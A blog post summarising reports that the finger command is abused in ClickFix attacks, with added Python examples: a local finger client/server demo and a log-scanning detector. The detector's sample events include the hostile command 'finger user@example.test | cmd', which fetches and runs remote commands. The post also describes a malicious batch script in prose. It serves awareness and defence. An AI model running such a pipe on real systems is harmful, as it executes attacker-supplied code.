Here’s something new: a decades-old, rarely used protocol is being used to deliver malware

Hacker pointing a finger

There is a decades-old command I didn’t know still existed today, called finger. It let you see whether someone you knew was online by looking up the username they used to log on.

Now, it looks like this is the second time this protocol has been abused to get malware onto someone’s machine, and as new things go, it would not surprise me if this continued into next year.

Finger Command Output

A normal finger command would look like the image above. For those who can’t see the image, Jaws GPT, as I call it, otherwise known as Picture Smart, says the following:

The image shows terminal text where a user named “bleeping” queries the “finger” command on a system called “bleep-test.” The output details the user information: login “bleeping,” real name “Lawrence Abrams,” home directory “/home/bleeping,” shell “/bin/bash,” and a placeholder office phone number. It shows two login sessions, one idle for 2 minutes 17 seconds on tty1 and another from IP 192.168.28.10 idle for 1 second. The user has no mail or plan files.

You’re probably thinking, “This is kind of cool. How do I run it?”

As I said, I didn’t know it was still around, but I did play with it when I was introduced to it. I believe it’s one of those command prompt type commands these days.
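To show what running it actually involves, here is an added example that is not part of the original post or the BleepingComputer article: a tiny Finger (RFC 1288) server and client on a local port. A finger query is nothing more than a username followed by CRLF sent over TCP port 79, and the reply is whatever text the server chooses to send back. The "bleeping" record is constructed from the screenshot description above, and the "payload" record is a constructed, harmless stand-in for the kind of text a malicious server would return; the client hands both back verbatim.

```python
"""Minimal Finger (RFC 1288) client/server exchange on localhost.

Added example; not code from the post or from BleepingComputer.
A finger query is just 'name\\r\\n' over TCP port 79, and the reply is
whatever text the server chooses to send. The client below returns that
text verbatim, which is the whole reason 'finger x@host | cmd' works.
"""
import socket
import threading

# Constructed records. 'bleeping' mirrors the screenshot described above;
# 'payload' is a harmless stand-in for a server that answers with commands.
RECORDS = {
    "bleeping": (
        "Login: bleeping                         Name: Lawrence Abrams\n"
        "Directory: /home/bleeping               Shell: /bin/bash\n"
        "On tty1, idle 2 minutes 17 seconds\n"
        "No mail.\nNo Plan.\n"
    ),
    "payload": "echo this text came from the finger server\r\n",
}


def handle(conn: socket.socket) -> None:
    """Serve one query: read up to CRLF, send the record, close the connection."""
    with conn:
        buf = b""
        while not buf.endswith(b"\r\n") and len(buf) < 512:
            chunk = conn.recv(256)
            if not chunk:
                break
            buf += chunk
        query = buf.decode("ascii", "replace").strip()
        if query.startswith("/W"):          # verbose flag; same lookup here
            query = query[2:].strip()
        if query == "":
            # An empty query asks for the list of users.
            reply = "Users: " + " ".join(sorted(RECORDS)) + "\n"
        else:
            reply = RECORDS.get(query, f"finger: {query}: no such user.\n")
        conn.sendall(reply.encode())


def start_server() -> int:
    """Bind an ephemeral local port and serve exactly one connection in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run() -> None:
        conn, _ = srv.accept()
        handle(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def finger(query: str, host: str, port: int = 79) -> str:
    """What the finger client does: send the query line, return the reply verbatim."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("utf-8", "replace")


def demo(query: str) -> str:
    """Start a local server and query it, returning the server's text."""
    return finger(query, "127.0.0.1", start_server())


if __name__ == "__main__":
    print(demo("bleeping"))
    # The client cannot tell this reply from a user record; piping it into
    # cmd.exe is exactly the abuse the article describes.
    print(repr(demo("payload")))
```

The point to take from it: nothing in the protocol distinguishes a user record from a line of shell commands. The real `finger` client on Windows or Linux behaves like `finger()` above, so whatever the remote server answers is what ends up on the pipe.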

Now, it seems the command can be used to hand out scripts, and it is being used as part of ClickFix attacks. We’ve talked about ClickFix before, and this is just a new tactic for getting their wares onto our machines.

The Finger command used for bad

Picture Smart says the following about this image of the Finger command:

The image displays a terminal or code editor window containing a script written in batch programming language. The script includes setting variables, loops, and conditional statements. It references various tools like Wireshark, Fiddler, ImmunityDebugger, and WindDump. The script checks for processes named “P.exe” or “SP.exe,” copies files with randomized names from curl commands, extracts PDF files, and runs shell commands involving DLLs. It also creates scheduled tasks using PowerShell with obfuscated variable names and terminates execution with an exit command.

There is even a RAT (Remote Access Trojan) that can be downloaded through this protocol.

It can even go so far as to deliver an archive, such as a zip file, disguised as a PDF file.

What we’re seeing is absolutely crazy, and so far this is all research and not widely used. It would not surprise me if that changes over the years.

The article’s first paragraphs describe finger.

The decades-old “finger” command is making a comeback, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it’s rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

The article continues:

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Abusing the finger command

Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the “finger [.]com” command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

For those who don’t know, cmd.exe is the executable for the Command Prompt. Pressing Win+R (the Windows key plus R) to bring up the Run dialog and typing cmd will do the trick.

JAWS, NVDA and other Windows screen readers have been programmed to work within it since DOS was retired.
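Since finger.exe is still shipped with Windows but almost never used legitimately, the practical defence is to alert on it. The following is an added example, not code from the post or from BleepingComputer, that scans process-creation records for the pattern the article describes: finger output piped into cmd.exe or PowerShell. The log lines are constructed for this example, and their `CommandLine="..."` field layout is an assumption rather than any particular product’s format; adapt the extraction regex to your own SIEM fields.

```python
"""Flag process-creation events where finger output is piped into a shell.

Added example; not from the post or from BleepingComputer. The log lines
below are constructed, and the CommandLine="..." layout is an assumption.
"""
import re
from dataclasses import dataclass

# finger or finger.exe as a whole word; does not match 'fingerprint.exe'.
FINGER_RE = re.compile(r"\bfinger(?:\.exe)?\b", re.IGNORECASE)
# A pipe into cmd/powershell/pwsh, with or without a path and .exe suffix.
PIPE_TO_SHELL_RE = re.compile(
    r'\|\s*(?:[^\s|"]*[\\/])?(?:cmd|powershell|pwsh)(?:\.exe)?\b', re.IGNORECASE
)
# Assumed field layout for the constructed events.
CMDLINE_RE = re.compile(r'CommandLine="([^"]*)"')

# Constructed sample events: one attack chain, two plain finger runs,
# one look-alike binary, and one unrelated process.
LOGS = [
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c finger user@example.test | cmd"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\finger.exe '
    'CommandLine="finger user@example.test"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c fingerprint.exe --scan"',
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c finger bleeping@bleep-test | more"',
    'EventID=4688 NewProcessName=C:\\Program Files\\Wireshark\\Wireshark.exe '
    'CommandLine="Wireshark.exe"',
]


@dataclass
class Finding:
    line_no: int
    severity: str
    reason: str
    command_line: str


def classify(command_line: str):
    """Return (severity, reason) for a command line, or None if finger is absent."""
    if not FINGER_RE.search(command_line):
        return None
    if PIPE_TO_SHELL_RE.search(command_line):
        # The remote finger server decides what cmd/powershell will run.
        return "high", "finger output piped into a shell"
    # Any finger.exe execution is unusual enough on a modern estate to review.
    return "medium", "finger.exe executed"


def scan(lines):
    """Extract each event's command line and collect findings in order."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = CMDLINE_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group(1))
        if verdict:
            findings.append(Finding(n, verdict[0], verdict[1], m.group(1)))
    return findings


if __name__ == "__main__":
    for f in scan(LOGS):
        print(f"line {f.line_no}: [{f.severity}] {f.reason}: {f.command_line}")
```

Note that the pipe lives in the parent shell’s command line, not in finger.exe’s own, so the rule has to look at cmd.exe and powershell.exe events as well as finger.exe itself; the first sample line shows that case, and the `| more` line shows a finger run that is still worth a look but not the attack chain.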

There’s plenty more, so please check out the article I found on this by BleepingComputer. It’s titled Decades-old ‘Finger’ protocol abused in ClickFix malware attacks, if this is something you’re interested in.

I found it interesting, I hope you do too.
